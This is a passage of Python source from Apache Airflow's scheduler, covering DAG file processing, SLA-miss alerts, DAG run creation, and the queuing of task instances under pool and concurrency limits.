self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running DagFileProcessor.process_file()
:rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
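# A hedged sketch of the parent/child result-channel pattern used by
# DagFileProcessorProcess.start() and .done above: the child sends one result object over a
# multiprocessing.Pipe and the parent polls before receiving so it never blocks forever.
# The function names here are illustrative only.
def _example_result_channel_child(conn):
    # Child side: send a single result and close the channel, as _run_file_processor does.
    conn.send({'processed': True})
    conn.close()

def _example_result_channel_roundtrip():
    # Parent side: mirror the poll()/recv()/join() sequence used by the 'done' property.
    parent_conn, child_conn = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=_example_result_channel_child, args=(child_conn,))
    proc.start()
    result = parent_conn.recv() if parent_conn.poll(5) else None
    proc.join()
    parent_conn.close()
    return result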
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to use while processing the file
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finds all tasks that have SLAs defined, and sends alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = [dag.get_task(sla.task_id) for sla in slas]
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, records any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for DAGs that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session
):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: list[airflow.models.DAG]
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only create DagRuns for DAGs that are not subdags, since
# DagRuns of subdags are created when the SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if check_slas:
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the DAGs found in the file,
and the number of import errors for the file
:rtype: Tuple[List[airflow.utils.dag_processing.SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
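# A hedged illustration of how a caller might consume DagFileProcessor.process_file above:
# it returns a list of SimpleDag objects plus the number of import errors for the file.
# 'processor', 'file_path' and 'zombies' are placeholder arguments for the example.
def _example_consume_process_file(processor, file_path, zombies):
    simple_dags, import_error_count = processor.process_file(file_path, zombies)
    return {'simple_dag_count': len(simple_dags), 'import_errors': import_error_count}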
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns is
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: a map from dag_id to # of task instances in the given states, and
a map from (dag_id, task_id) to # of task instances in the given states
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these don't expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contain all of the task_instances' DAGs
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do not exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
